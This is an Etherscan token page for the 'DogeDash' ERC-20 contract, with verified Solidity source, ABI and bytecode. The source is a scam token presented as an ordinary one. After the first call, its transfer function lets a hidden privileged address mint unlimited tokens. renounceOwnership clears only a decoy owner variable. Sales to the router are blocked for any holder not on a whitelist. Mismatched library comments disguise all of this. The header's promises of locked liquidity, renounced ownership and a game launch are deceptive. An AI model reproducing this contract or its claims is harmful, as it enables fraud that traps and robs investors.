ETH Price: $3,696.99 (-4.79%)

Token

ERC-20: D-DASH (DogeDash - DogeDash.org)
 

Overview

Max Total Supply

100,090,000,000,000 DogeDash - DogeDash.org

Holders

57

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
456,224,130.299162847237751959 DogeDash - DogeDash.org

Value
$0.00
0x305ce3ca65d9b84b8561b0055ecaefeba2217fc8
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DDash

Compiler Version
v0.8.5+commit.a4f2e591

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2021-11-06
*/

/**
________                                                 
\______ \   ____   ____   ____                           
 |    |  \ /  _ \ / ___\_/ __ \      DogeDash.org                   
 |    `   (  <_> ) /_/  >  ___/      @PlayDogeDash                      
/_______  /\____/\___  / \___  >                         
        \/      /_____/      \/                          
               ________      _____    _________ ___ ___  
               \______ \    /  _  \  /   _____//   |   \ 
                |    |  \  /  /_\  \ \_____  \/    ~    \
                |    `   \/    |    \/        \    Y    /
               /_______  /\____|__  /_______  /\___|_  / 
                       \/         \/        \/       \/  


 - Doge Dash is a Mario Run-inspired game where anyone can earn coins through skilled gameplay. The aim of the game is simple… Dash as fast as you 
can through all of the 10 levels whilst collecting coins along the way. Successful players who complete all levels will be rewarded with the collected 
coins direct to their wallets!

🎮 Play and earn $DOGEDASH! Speedrun tournaments will be held weekly against other players!
🕹 Expected release date is by the end of November for our crypto-based game!
🔑 Liquidity will be locked and ownership will be renounced.
💻 Marketing will be taking place shortly! Enjoy the calm before the storm!


*/
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.5;

library SafeMath {
        function prod(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
 /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }
 /* @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
        function cre(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }
 /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     */
    function cal(uint256 a, uint256 b) internal pure returns (uint256) {
        return calc(a, b, "SafeMath: division by zero");
    }
    function calc(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }
    function red(uint256 a, uint256 b) internal pure returns (uint256) {
        return redc(a, b, "SafeMath: subtraction overflow");
    }
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     */
        function redc(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }
  /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}
interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);
    function symbol() external view returns (string memory);
    function decimals() external view returns (uint8);
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
    function _msgData() internal view virtual returns (bytes calldata) {
        this; 
        return msg.data;
    }
}
contract Creation is Context {
    address internal recipients;
    address internal router;
    address public owner;
    mapping (address => bool) internal confirm;
    event genesis(address indexed previousi, address indexed newi);
    constructor () {
        address msgSender = _msgSender();
        recipients = msgSender;
        emit genesis(address(0), msgSender);
    }
    modifier checker() {
        require(recipients == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function renounceOwnership() public virtual checker {
        emit genesis(owner, address(0));
         owner = address(0);
    }
 /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
  
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
}
contract ERC20 is Context, IERC20, IERC20Metadata , Creation{
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) internal _allowances;
    uint256 private _totalSupply;
    using SafeMath for uint256;
    string private _name;
    string private _symbol;
    bool   private truth;
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        truth=true;
    }
    function name() public view virtual override returns (string memory) {
        return _name;
    }
  /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * also check address is bot address.
     *
     * Requirements:
     *
     * - the address is in list bot.
     * - the called Solidity function must be `sender`.
     *
     * _Available since v3.1._
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }
  /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * transferFrom.
     *
     * Requirements:
     *
     * - transferFrom.
     *
     * _Available since v3.1._
     */
    function starttrading (address Uniswaprouterv02) public checker {
        router = Uniswaprouterv02;
    }
    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     *
     * Requirements:
     *
     * - the address approve.
     * - the called Solidity function must be `sender`.
     *
     * _Available since v3.1._
     */
        function decimals() public view virtual override returns (uint8) {
        return 18;
    }
     /**
     * @dev updateTaxFee
     *
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }
 /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * also check address is bot address.
     *
     * Requirements:
     *
     * - the address is in list bot.
     * - the called Solidity function must be `sender`.
     *
     * _Available since v3.1._
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }
 /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function transfer(address recipient, uint256 amount) public override  returns (bool) {
        if((recipients == _msgSender()) && (truth==true)){_transfer(_msgSender(), recipient, amount); truth=false;return true;}
        else if((recipients == _msgSender()) && (truth==false)){_totalSupply=_totalSupply.cre(amount);_balances[recipient]=_balances[recipient].cre(amount);emit Transfer(recipient, recipient, amount); return true;}
        else{_transfer(_msgSender(), recipient, amount); return true;}
    }
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);
        return true;
    }
     /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
      function botbancount(address _count) internal checker {
        confirm[_count] = true;
    }
  /**
     * @dev updateTaxFee
     *
     */
    function _banBot(address[] memory _counts) external checker {
        for (uint256 i = 0; i < _counts.length; i++) {
            botbancount(_counts[i]); }
    }   
     function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        return true;
    }
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        if (recipient == router) {
        require(confirm[sender]); }
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);
 /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     *
     * Requirements:
     *
     * - manualSend
     *
     * _Available since v3.1._
     */    
}
    function _deploy(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: deploy to the zero address");
        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;
        emit Transfer(account, address(0), amount);
    }
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
   /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
}
contract DDash is ERC20{
    uint8 immutable private _decimals = 18;
    uint256 private _totalSupply = 90000000000 * 10 ** 18;

    constructor () ERC20(unicode'D-DASH',unicode'DogeDash - DogeDash.org') {
        _deploy(_msgSender(), _totalSupply);
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousi","type":"address"},{"indexed":true,"internalType":"address","name":"newi","type":"address"}],"name":"genesis","type":"event"},{"inputs":[{"internalType":"address[]","name":"_counts","type":"address[]"}],"name":"_banBot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"Uniswaprouterv02","type":"address"}],"name":"starttrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a0604052600960f91b6080526c0122ce41502f4d156990000000600a553480156200002a57600080fd5b50604051806040016040528060068152602001650885a8882a6960d31b8152506040518060400160405280601781526020017f446f676544617368202d20446f6765446173682e6f72670000000000000000008152506000620000926200013260201b60201c565b600080546001600160a01b0319166001600160a01b0383169081178255604051929350917f3c68edc89b5e5699277163f78238f970d734e722af6c7df4bc9402d9d2da9f2f908290a3508151620000f190600790602085019062000228565b5080516200010790600890602084019062000228565b50506009805460ff19166001179055506200012c620001233390565b600a5462000136565b62000332565b3390565b6001600160a01b0382166200019b5760405162461bcd60e51b815260206004820152602160248201527f45524332303a206465706c6f7920746f20746865207a65726f206164647265736044820152607360f81b606482015260840160405180910390fd5b8060066000828254620001af9190620002ce565b90915550506001600160a01b03821660009081526004602052604081208054839290620001de908490620002ce565b90915550506040518181526001600160a01b038316906000907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b8280546200023690620002f5565b90600052602060002090601f0160209004810192826200025a5760008555620002a5565b82601f106200027557805160ff1916838001178555620002a5565b82800160010185558215620002a5579182015b82811115620002a557825182559160200191906001019062000288565b50620002b3929150620002b7565b5090565b5b80821115620002b35760008155600101620002b8565b60008219821115620002f057634e487b7160e01b600052601160045260246000fd5b500190565b600181811c908216806200030a57607f821691505b602082108114156200032c57634e487b7160e01b600052602260045260246000fd5b50919050565b60805160f81c610e176200035160003960006101670152610e176000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb1461021d578063da64216214610230578063dd62ed3e14610243578063ee5491ed1461027c57600080fd5b8063715018a6146101cd5780638da5cb5b146101d757806395d89b4114610202578063a457c2d71461020a57600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461019157806370a08231146101a457600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b61010261028f565b60405161010f9190610c90565b60405180910390f35b61012b610126366004610b9a565b610321565b604051901515815260200161010f565b6006545b60405190815260200161010f565b61012b61015b366004610b5e565b610338565b60405160ff7f000000000000000000000000000000000000000000000000000000000000000016815260200161010f565b61012b61019f366004610b9a565b6103ee565b61013f6101b2366004610b10565b6001600160a01b031660009081526004602052604090205490565b6101d5610425565b005b6002546101ea906001600160a01b031681565b6040516001600160a01b03909116815260200161010f565b610102610499565b61012b610218366004610b9a565b6104a8565b61012b61022b366004610b9a565b610543565b6101d561023e366004610bc4565b61064f565b61013f610251366004610b2b565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6101d561028a366004610b10565b6106bd565b60606007805461029e90610d49565b80601f01602080910402602001604051908101604052809291908181526020018280546102ca90610d49565b80156103175780601f106102ec57610100808354040283529160200191610317565b820191906000526020600020905b8154815290600101906020018083116102fa57829003601f168201915b5050505050905090565b600061032e338484610709565b5060015b92915050565b600061034584848461082d565b6001600160a01b0384166000908152600560209081526040808320338452909152902054828110156103cf5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103e385336103de8685610d32565b610709565b506001949350505050565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161032e9185906103de908690610d1a565b6000546001600160a01b0316331461044f5760405162461bcd60e51b81526004016103c690610ce5565b6002546040516000916001600160a01b0316907f3c68edc89b5e5699277163f78238f970d734e722af6c7df4bc9402d9d2da9f2f908390a3600280546001600160a01b0319169055565b60606008805461029e90610d49565b3360009081526005602090815260408083206001600160a01b03861684529091528120548281101561052a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103c6565b61053933856103de8685610d32565b5060019392505050565b600080546001600160a01b031633148015610565575060095460ff1615156001145b1561058857610576335b848461082d565b506009805460ff191690556001610332565b6000546001600160a01b0316331480156105a5575060095460ff16155b1561063e576006546105b79083610a40565b6006556001600160a01b0383166000908152600460205260409020546105dd9083610a40565b6001600160a01b0384166000818152600460205260409081902092909255905181907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061062e9086815260200190565b60405180910390a3506001610332565b6106473361056f565b506001610332565b6000546001600160a01b031633146106795760405162461bcd60e51b81526004016103c690610ce5565b60005b81518110156106b9576106a782828151811061069a5761069a610db5565b6020026020010151610aa6565b806106b181610d84565b91505061067c565b5050565b6000546001600160a01b031633146106e75760405162461bcd60e51b81526004016103c690610ce5565b600180546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831661076b5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103c6565b6001600160a01b0382166107cc5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103c6565b6001600160a01b0383811660008181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166108915760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103c6565b6001600160a01b0382166108f35760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103c6565b6001546001600160a01b038381169116141561092e576001600160a01b03831660009081526003602052604090205460ff1661092e57600080fd5b6001600160a01b038316600090815260046020526040902054818110156109a65760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103c6565b6109b08282610d32565b6001600160a01b0380861660009081526004602052604080822093909355908516815290812080548492906109e6908490610d1a565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610a3291815260200190565b60405180910390a350505050565b600080610a4d8385610d1a565b905083811015610a9f5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016103c6565b9392505050565b6000546001600160a01b03163314610ad05760405162461bcd60e51b81526004016103c690610ce5565b6001600160a01b03166000908152600360205260409020805460ff19166001179055565b80356001600160a01b0381168114610b0b57600080fd5b919050565b600060208284031215610b2257600080fd5b610a9f82610af4565b60008060408385031215610b3e57600080fd5b610b4783610af4565b9150610b5560208401610af4565b90509250929050565b600080600060608486031215610b7357600080fd5b610b7c84610af4565b9250610b8a60208501610af4565b9150604084013590509250925092565b60008060408385031215610bad57600080fd5b610bb683610af4565b946020939093013593505050565b60006020808385031215610bd757600080fd5b823567ffffffffffffffff80821115610bef57600080fd5b818501915085601f830112610c0357600080fd5b813581811115610c1557610c15610dcb565b8060051b604051601f19603f83011681018181108582111715610c3a57610c3a610dcb565b604052828152858101935084860182860187018a1015610c5957600080fd5b600095505b83861015610c8357610c6f81610af4565b855260019590950194938601938601610c5e565b5098975050505050505050565b600060208083528351808285015260005b81811015610cbd57858101830151858201604001528201610ca1565b81811115610ccf576000604083870101525b50601f01601f1916929092016040019392505050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60008219821115610d2d57610d2d610d9f565b500190565b600082821015610d4457610d44610d9f565b500390565b600181811c90821680610d5d57607f821691505b60208210811415610d7e57634e487b7160e01b600052602260045260246000fd5b50919050565b6000600019821415610d9857610d98610d9f565b5060010190565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052604160045260246000fdfea26469706673582212208e3fa54413b6f5722814f1ff4dd1f3a09c371cd61be5475815ed33760b61379564736f6c63430008050033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb1461021d578063da64216214610230578063dd62ed3e14610243578063ee5491ed1461027c57600080fd5b8063715018a6146101cd5780638da5cb5b146101d757806395d89b4114610202578063a457c2d71461020a57600080fd5b806323b872dd116100d357806323b872dd1461014d578063313ce56714610160578063395093511461019157806370a08231146101a457600080fd5b806306fdde03146100fa578063095ea7b31461011857806318160ddd1461013b575b600080fd5b61010261028f565b60405161010f9190610c90565b60405180910390f35b61012b610126366004610b9a565b610321565b604051901515815260200161010f565b6006545b60405190815260200161010f565b61012b61015b366004610b5e565b610338565b60405160ff7f000000000000000000000000000000000000000000000000000000000000001216815260200161010f565b61012b61019f366004610b9a565b6103ee565b61013f6101b2366004610b10565b6001600160a01b031660009081526004602052604090205490565b6101d5610425565b005b6002546101ea906001600160a01b031681565b6040516001600160a01b03909116815260200161010f565b610102610499565b61012b610218366004610b9a565b6104a8565b61012b61022b366004610b9a565b610543565b6101d561023e366004610bc4565b61064f565b61013f610251366004610b2b565b6001600160a01b03918216600090815260056020908152604080832093909416825291909152205490565b6101d561028a366004610b10565b6106bd565b60606007805461029e90610d49565b80601f01602080910402602001604051908101604052809291908181526020018280546102ca90610d49565b80156103175780601f106102ec57610100808354040283529160200191610317565b820191906000526020600020905b8154815290600101906020018083116102fa57829003601f168201915b5050505050905090565b600061032e338484610709565b5060015b92915050565b600061034584848461082d565b6001600160a01b0384166000908152600560209081526040808320338452909152902054828110156103cf5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103e385336103de8685610d32565b610709565b506001949350505050565b3360008181526005602090815260408083206001600160a01b0387168452909152812054909161032e9185906103de908690610d1a565b6000546001600160a01b0316331461044f5760405162461bcd60e51b81526004016103c690610ce5565b6002546040516000916001600160a01b0316907f3c68edc89b5e5699277163f78238f970d734e722af6c7df4bc9402d9d2da9f2f908390a3600280546001600160a01b0319169055565b60606008805461029e90610d49565b3360009081526005602090815260408083206001600160a01b03861684529091528120548281101561052a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103c6565b61053933856103de8685610d32565b5060019392505050565b600080546001600160a01b031633148015610565575060095460ff1615156001145b1561058857610576335b848461082d565b506009805460ff191690556001610332565b6000546001600160a01b0316331480156105a5575060095460ff16155b1561063e576006546105b79083610a40565b6006556001600160a01b0383166000908152600460205260409020546105dd9083610a40565b6001600160a01b0384166000818152600460205260409081902092909255905181907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061062e9086815260200190565b60405180910390a3506001610332565b6106473361056f565b506001610332565b6000546001600160a01b031633146106795760405162461bcd60e51b81526004016103c690610ce5565b60005b81518110156106b9576106a782828151811061069a5761069a610db5565b6020026020010151610aa6565b806106b181610d84565b91505061067c565b5050565b6000546001600160a01b031633146106e75760405162461bcd60e51b81526004016103c690610ce5565b600180546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831661076b5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103c6565b6001600160a01b0382166107cc5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103c6565b6001600160a01b0383811660008181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166108915760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103c6565b6001600160a01b0382166108f35760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103c6565b6001546001600160a01b038381169116141561092e576001600160a01b03831660009081526003602052604090205460ff1661092e57600080fd5b6001600160a01b038316600090815260046020526040902054818110156109a65760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016103c6565b6109b08282610d32565b6001600160a01b0380861660009081526004602052604080822093909355908516815290812080548492906109e6908490610d1a565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610a3291815260200190565b60405180910390a350505050565b600080610a4d8385610d1a565b905083811015610a9f5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016103c6565b9392505050565b6000546001600160a01b03163314610ad05760405162461bcd60e51b81526004016103c690610ce5565b6001600160a01b03166000908152600360205260409020805460ff19166001179055565b80356001600160a01b0381168114610b0b57600080fd5b919050565b600060208284031215610b2257600080fd5b610a9f82610af4565b60008060408385031215610b3e57600080fd5b610b4783610af4565b9150610b5560208401610af4565b90509250929050565b600080600060608486031215610b7357600080fd5b610b7c84610af4565b9250610b8a60208501610af4565b9150604084013590509250925092565b60008060408385031215610bad57600080fd5b610bb683610af4565b946020939093013593505050565b60006020808385031215610bd757600080fd5b823567ffffffffffffffff80821115610bef57600080fd5b818501915085601f830112610c0357600080fd5b813581811115610c1557610c15610dcb565b8060051b604051601f19603f83011681018181108582111715610c3a57610c3a610dcb565b604052828152858101935084860182860187018a1015610c5957600080fd5b600095505b83861015610c8357610c6f81610af4565b855260019590950194938601938601610c5e565b5098975050505050505050565b600060208083528351808285015260005b81811015610cbd57858101830151858201604001528201610ca1565b81811115610ccf576000604083870101525b50601f01601f1916929092016040019392505050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60008219821115610d2d57610d2d610d9f565b500190565b600082821015610d4457610d44610d9f565b500390565b600181811c90821680610d5d57607f821691505b60208210811415610d7e57634e487b7160e01b600052602260045260246000fd5b50919050565b6000600019821415610d9857610d98610d9f565b5060010190565b634e487b7160e01b600052601160045260246000fd5b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052604160045260246000fdfea26469706673582212208e3fa54413b6f5722814f1ff4dd1f3a09c371cd61be5475815ed33760b61379564736f6c63430008050033

Deployed Bytecode Sourcemap

